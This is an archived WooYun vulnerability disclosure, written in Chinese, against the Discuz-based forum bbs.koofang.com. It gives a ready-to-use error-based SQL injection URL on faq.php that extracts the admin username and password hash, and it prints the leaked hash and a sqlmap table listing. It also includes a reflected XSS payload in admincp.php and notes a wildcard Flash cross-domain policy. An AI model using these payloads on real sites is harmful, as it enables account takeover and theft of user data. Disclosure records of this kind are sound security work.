乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-06: 细节已通知厂商并且等待厂商处理中 2015-12-11: 厂商已经主动忽略漏洞,细节向公众公开
rt
0x01:faq.php存在sql注射http://bbs.koofang.com利用代码:
http://bbs.koofang.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20(select%20(select%20concat(username,0x27,password)%20from%20cdb_members%20limit%201)%20)%20from%20`information_schema`.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
SQL: SELECT * FROM [Table]usergroups u LEFT JOIN [Table]admingroups a ON u.groupid=a.admingid WHERE u.groupid IN ('7','\',') and (select 1 from (select count(*),concat((select (select (select concat(username,0x27,password) from [Table]members limit 1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#')Error: Duplicate entry 'admin'5e7a0a348c1f25d537e71d4de73f9ddb1' for key 'group_key'Errno.: 1062
sqlmap图:
Database: bbs_utf8[112 tables]+--------------------------+| [Table]access || [Table]activities || [Table]activityapplies || [Table]addons || [Table]adminactions || [Table]admincustom || [Table]admingroups || [Table]adminnotes || [Table]adminsessions || [Table]advertisements || [Table]announcements || [Table]attachmentfields || [Table]attachments || [Table]attachpaymentlog || [Table]attachtypes || [Table]banned || [Table]bbcodes || [Table]caches || [Table]creditslog || [Table]crons || [Table]debateposts || [Table]debates || [Table]dzpoll_attachment || [Table]dzpoll_config || [Table]dzpoll_option || [Table]dzpoll_vote || [Table]dzpoll || [Table]failedlogins || [Table]faqs || [Table]favoriteforums || [Table]favorites || [Table]favoritethreads || [Table]feeds || [Table]forumfields || [Table]forumlinks || [Table]forumrecommend || [Table]forums || [Table]imagetypes || [Table]imgpolloptions || [Table]imgpolls || [Table]invites || [Table]itempool || [Table]magiclog || [Table]magicmarket || [Table]magics || [Table]medallog || [Table]medals || [Table]memberfields || [Table]membermagics || [Table]memberrecommend || [Table]members_bak || [Table]members || [Table]memberspaces || [Table]moderators || [Table]modworks || [Table]myrepeats || [Table]mytasks || [Table]navs || [Table]onlinelist || [Table]onlinetime || [Table]orders || [Table]paymentlog || [Table]pluginhooks || [Table]plugins || [Table]pluginvars || [Table]polloptions || [Table]polls || [Table]postposition || [Table]posts || [Table]profilefields || [Table]projects || [Table]promotions || [Table]prompt || [Table]promptmsgs || [Table]prompttype || [Table]ranks || [Table]ratelog || [Table]regips || [Table]relatedthreads || [Table]reportlog || [Table]request || [Table]rewardlog || [Table]rsscaches || [Table]searchindex || [Table]sessions || [Table]settings || [Table]smilies || [Table]spacecaches || [Table]stats || [Table]statvars || [Table]styles || [Table]stylevars || [Table]tags || [Table]tasks || [Table]taskvars || [Table]templates || [Table]threads || [Table]threadsmod || [Table]threadtags || [Table]threadtypes || [Table]tradecomments || [Table]tradelog || [Table]tradeoptionvars || [Table]trades || [Table]typemodels || [Table]typeoptions || [Table]typeoptionvars || [Table]typevars || [Table]usergroups || [Table]validating || [Table]warnings || [Table]words |+--------------------------+
0x02:xsshttp://bbs.koofang.com/admincp.php?infloat=yes&handlekey=123);alert(/WooYun/);//如图:
0x03:flash跨域
http://bbs.koofang.com/crossdomain.xml
*代表任意0x04:一处代码错误
http://beijing.koofang.com/up.php
我是来找礼物的!我是来找礼物的!我是来找礼物的!我是来找礼物的!我是来找礼物的!我是来找礼物的!我是来找礼物的!
危害等级:无影响厂商忽略
忽略时间:2015-12-11 21:40
漏洞Rank:4 (WooYun评价)
暂无
